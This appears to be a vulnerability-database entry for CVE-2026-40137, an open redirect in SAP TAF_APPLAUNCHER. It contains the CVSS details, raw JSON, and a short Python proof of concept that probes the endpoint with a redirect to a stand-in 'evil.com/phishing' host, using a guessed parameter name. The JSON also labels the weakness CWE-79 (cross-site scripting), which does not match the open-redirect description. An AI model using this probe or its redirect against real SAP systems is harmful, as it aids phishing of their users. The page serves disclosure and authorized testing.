Security Vulnerability Report
CVE-2026-40137 CVSS 6.1 MEDIUM

CVE-2026-40137

Published: 2026-05-12 03:16:13
Last Modified: 2026-05-12 03:16:13

Description

SAP TAF_APPLAUNCHER within Business Server Pages allows an unauthenticated attacker to craft malicious links that, when clicked by a victim, redirect them to attacker-controlled sites, potentially exposing or altering sensitive information in the victim's browser. This results in a low impact on confidentiality and integrity, with no impact on the availability of the application.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP TAF_APPLAUNCHER (see SAP Note 3727717 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-40137
# This script demonstrates the open redirect vulnerability.
# Note: The actual parameter name may vary depending on the specific SAP configuration.
import requests


def check_open_redirect(target_host, malicious_url):
    # Common parameters for redirects in SAP applications might include
    # 'target', 'url', 'redirect_url', etc.
    # This example assumes a parameter named 'target'.
    payload = {'target': malicious_url}

    # Construct the full vulnerable endpoint URL.
    # Based on the CVE, the component is TAF_APPLAUNCHER.
    vuln_endpoint = f"{target_host}/sap/bc/bsp/sap/taf_applauncher/"

    try:
        print(f"[*] Testing endpoint: {vuln_endpoint}")
        # allow_redirects=False so the server's own redirect response is inspected
        # rather than followed.
        response = requests.get(vuln_endpoint, params=payload,
                                allow_redirects=False, timeout=10)

        # Check for a redirect status code (301, 302, 303, 307, 308)
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location')
            if location and malicious_url in location:
                print("[+] Vulnerability Confirmed!")
                print(f"[+] Server redirected to: {location}")
                return True

        print(f"[-] Not vulnerable or parameter incorrect. Status: {response.status_code}")
        return False
    except Exception as e:
        print(f"[!] Error during request: {e}")
        return False


if __name__ == "__main__":
    target = "http://vulnerable-sap-server.example.com"
    evil_site = "http://evil.com/phishing"
    check_open_redirect(target, evil_site)

References

https://me.sap.com/notes/3727717
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40137",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T03:16:12.693",
    "lastModified": "2026-05-12T03:16:12.693",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP TAF_APPLAUNCHER within Business Server Pages allows an unauthenticated attacker to craft malicious links that, when clicked by a victim, redirects them to attacker-controlled sites, potentially exposing or altering sensitive information in the victim's browser. This results in a low impact on confidentiality and integrity, with no impact on the availability of the application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3727717",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}